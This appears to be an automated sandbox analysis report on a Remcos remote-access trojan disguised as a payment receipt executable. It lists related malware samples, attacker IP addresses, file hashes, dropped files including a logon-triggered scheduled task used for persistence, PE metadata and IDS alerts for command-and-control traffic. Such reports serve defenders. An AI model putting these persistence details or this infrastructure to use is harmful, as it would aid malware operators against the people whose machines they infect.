BBVA S.A..vbs | malicious | Remcos | 178.237.33.50
Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 178.237.33.50
Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 178.237.33.50
givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
7Sbq4gMMlp.exe | malicious | Remcos | 178.237.33.50
PO_0099822111ORDER.js | malicious | Remcos | 178.237.33.50
requests-pdf.exe | malicious | Remcos | 178.237.33.50
Documents.pdf | malicious | Remcos, DBatLoader | 178.237.33.50
Context for ASN AS-COLOCROSSINGUS (Associated Sample Name | Detection | Threat Name | IP):
Document.xla | malicious | Unknown | 172.245.123.12
greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta | malicious | Cobalt Strike, Remcos | 23.95.235.29
sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta | malicious | Cobalt Strike, Remcos | 23.95.235.29
createdbetterthingswithgreatnressgivenmebackwithnice.hta | malicious | Cobalt Strike, FormBook | 172.245.123.12
ORDER-24171200967.XLS..js | malicious | WSHRat, Caesium Obfuscator, STRRAT | 192.3.220.6
newthingswithgreatupdateiongivenbestthingswithme.hta | malicious | Cobalt Strike, Remcos | 107.173.4.16
crreatedbestthingswithgreatattitudeneedforthat.hta | malicious | Cobalt Strike, Remcos | 107.173.4.16
Smple_Order-048576744759475945.xls | malicious | Unknown | 192.3.179.166
Smple_Order-048576744759475945.xls | malicious | Unknown | 192.3.179.166
Document.xla.xlsx | malicious | Unknown | 172.245.123.12

Context for ASN ATOM86-ASATOM86NL (Associated Sample Name | Detection | Threat Name | IP):
BBVA S.A..vbs | malicious | Remcos | 178.237.33.50
Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe | malicious | Remcos, GuLoader | 178.237.33.50
Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe | malicious | Remcos, GuLoader | 178.237.33.50
Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe | malicious | Remcos, GuLoader | 178.237.33.50
givenbestupdatedoingformebestthingswithgreatnewsformegive.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
clearentirethingwithbestnoticetheeverythinggooodfrome.hta | malicious | Cobalt Strike, Remcos | 178.237.33.50
7Sbq4gMMlp.exe | malicious | Remcos | 178.237.33.50
PO_0099822111ORDER.js | malicious | Remcos | 178.237.33.50
requests-pdf.exe | malicious | Remcos | 178.237.33.50
Documents.pdf | malicious | Remcos, DBatLoader | 178.237.33.50
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1415
                                                  Entropy (8bit):5.352427679901606
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                  MD5:97AD91F1C1F572C945DA12233082171D
                                                  SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                  SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                  SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                  Malicious:true
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                  Process:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1415
                                                  Entropy (8bit):5.352427679901606
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                  MD5:97AD91F1C1F572C945DA12233082171D
                                                  SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                  SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                  SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):963
                                                  Entropy (8bit):5.0171130712019085
                                                  Encrypted:false
                                                  SSDEEP:12:tkluWJmnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkD:qlupdbauKyGX85jvXhNlT3/7CcVKWro
                                                  MD5:0A55905951B6633AC409C89A600E5B38
                                                  SHA1:A8D63D48564E1A2F3C222B98C163E9B541042DA2
                                                  SHA-256:1E06332C729A91A1DBE6ABE75457CA239DAB2B3EC27E3AAC6BD57D357EF35FEC
                                                  SHA-512:99BE9B0C66C0C52F9F96B764146382DF6A93CF4EC053219903C2B7316136DDAA7E4510EBB5D4BADE50685C6A77F52FD81F594A22D7BF147576F464C3FAABD486
                                                  Malicious:false
                                                  Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.380805901110357
                                                  Encrypted:false
                                                  SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:lGLHyIFKL3IZ2KRH9OugYs
                                                  MD5:A9155A6B0927A3C0F28D51A6B7113A96
                                                  SHA1:02E3CEAD53BE46D65C1BED154A51707D856DFEA2
                                                  SHA-256:168BD0354D375B14667BB2E7BD23754D06F31D46707329A334FAB6394BCF74BD
                                                  SHA-512:AA1D2C2D7825C02187712FB2AA6F0408E88D8A5F3C95ED1406BFCED825CFA965D53531893E7E655A04A058877A779A35AD6F73FB0A9A40A105B950083330D80E
                                                  Malicious:false
                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                  Category:dropped
                                                  Size (bytes):15728640
                                                  Entropy (8bit):0.10106922760070924
                                                  Encrypted:false
                                                  SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                  MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                  SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                  SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                  SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                  Malicious:false
                                                  Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:Qn:Qn
                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                  Malicious:false
                                                  Preview:..
                                                  Process:C:\Users\user\AppData\Roaming\eaJOpx.exe
                                                  File Type:XML 1.0 document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):1579
                                                  Entropy (8bit):5.098206194352828
                                                  Encrypted:false
                                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtg+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTgyv
                                                  MD5:68E55A87975C676F40922F833B99541C
                                                  SHA1:9156F94EBB60D490C4C2FEDA24AAA78AF08C10B0
                                                  SHA-256:B8A7A164FF14157BE8B1B2D352950341A6C743F5619E5CF2FED66E31C4A741B8
                                                  SHA-512:8801D3D91F010B6E13FE11993F2CDBF92427738F9E1F7B4169DBCE8E9976996B58833CFEC0A7C7DC4CF3DA00FEEF938C1DB7E760B650CF651BBCF9EF6C5906E3
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:XML 1.0 document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):1579
                                                  Entropy (8bit):5.098206194352828
                                                  Encrypted:false
                                                  SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtg+xvn:cgergYrFdOFzOzN33ODOiDdKrsuTgyv
                                                  MD5:68E55A87975C676F40922F833B99541C
                                                  SHA1:9156F94EBB60D490C4C2FEDA24AAA78AF08C10B0
                                                  SHA-256:B8A7A164FF14157BE8B1B2D352950341A6C743F5619E5CF2FED66E31C4A741B8
                                                  SHA-512:8801D3D91F010B6E13FE11993F2CDBF92427738F9E1F7B4169DBCE8E9976996B58833CFEC0A7C7DC4CF3DA00FEEF938C1DB7E760B650CF651BBCF9EF6C5906E3
                                                  Malicious:true
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1193984
                                                  Entropy (8bit):7.633790432294662
                                                  Encrypted:false
                                                  SSDEEP:24576:CHoI9FW8oqKqzDHgz2XmSkZVgZ9g/oPd+p:CHL0q/D22kZVa9gAPsp
                                                  MD5:1F0AE2753F131F73C2FE881C1C8E7C8F
                                                  SHA1:E3D9F0DE991F7B91C04449A0A12CB398DF6CBD21
                                                  SHA-256:695E10634E8981A0D110A120BADE28B66B58C6400879B37257894D219C55048D
                                                  SHA-512:C300B4A521E90FBB4FDDCE0E11113230AFC9C383BE47E7E0A1FC13AA3178703FBF0CA37A6633FDE98A681BFBB7A4F1603F851ED6750E315B1CDAD1706631285F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 34%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag..............0..$...........B... ...`....@.. ....................................@.................................bB..O....`..................................T............................................ ............... ..H............text...."... ...$.................. ..`.rsrc........`.......&..............@..@.reloc...............6..............@..B.................B......H.......T...PN..............0..............................................}.....r...ps....}......}.....(.......(.....*..0..5..........}.....{....o.....sE.....o......(......{....o.....*....0..5..........}.....{....o.....s?.....o......(......{....o.....*...{....o.....(......{....o.....*...0............{.........,..(......*..*...0..+.........,..{.......+....,...{....o........(.....*..0................(....s......s....}.....s....}.....s....}.....( .....{....r...p"..\A...s!...o".
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.633790432294662
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:SwiftCopy_PaymtRecpt121228.exe
                                                  File size:1'193'984 bytes
                                                  MD5:1f0ae2753f131f73c2fe881c1c8e7c8f
                                                  SHA1:e3d9f0de991f7b91c04449a0a12cb398df6cbd21
                                                  SHA256:695e10634e8981a0d110a120bade28b66b58c6400879b37257894d219c55048d
                                                  SHA512:c300b4a521e90fbb4fddce0e11113230afc9c383be47e7e0a1fc13aa3178703fbf0ca37a6633fde98a681bfbb7a4f1603f851ed6750e315b1cdad1706631285f
                                                  SSDEEP:24576:CHoI9FW8oqKqzDHgz2XmSkZVgZ9g/oPd+p:CHL0q/D22kZVa9gAPsp
                                                  TLSH:8D45D0C03736B301DD68A6708825EDB813692E746050F5EABDEE37CB75B9B116E08F46
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ag..............0..$...........B... ...`....@.. ....................................@................................
                                                  Icon Hash:7d5876664a9b81e1
                                                  Entrypoint:0x5142b6
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x67611DD1 [Tue Dec 17 06:44:33 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x114262 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x116000 | 0x10ed0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x128000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x111fd4 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1122bc | 0x112400 | 456f903993cf6102d856ea1ae892cc76 | False | 0.8407900452939836 | OpenPGP Secret Key | 7.753706861790718 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x116000 | 0x10ed0 | 0x11000 | 7de2abb54880b034029676a732e35bb7 | False | 0.13677619485294118 | data | 4.16670306109466 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x128000 | 0xc | 0x200 | ec187c555b3a1ee6a6d27dea393d2880 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x116130 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.1281349816633148
RT_GROUP_ICON | 0x126958 | 0x14 | data | | | 1.0
RT_VERSION | 0x12696c | 0x378 | data | | | 0.43243243243243246
RT_MANIFEST | 0x126ce4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-17T16:37:04.673904+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49706 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:37:07.330710+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49708 | 178.237.33.50 | 80 | TCP
2024-12-17T16:39:56.158723+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49983 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:39:56.361838+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49984 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:40:02.502445+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49985 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:40:11.721264+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49986 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:40:11.940037+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49987 | 192.210.150.17 | 56887 | TCP
2024-12-17T16:40:18.830725+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49988 | 192.210.150.17 | 56887 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Dec 17, 2024 16:39:57.808844090 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.808876991 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.808887959 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.808947086 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.808957100 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809034109 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809042931 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809132099 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809139967 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809176922 CET5688749984192.210.150.17192.168.2.5
                                                  Dec 17, 2024 16:39:57.809185028 CET5688749984192.210.150.17192.168.2.5
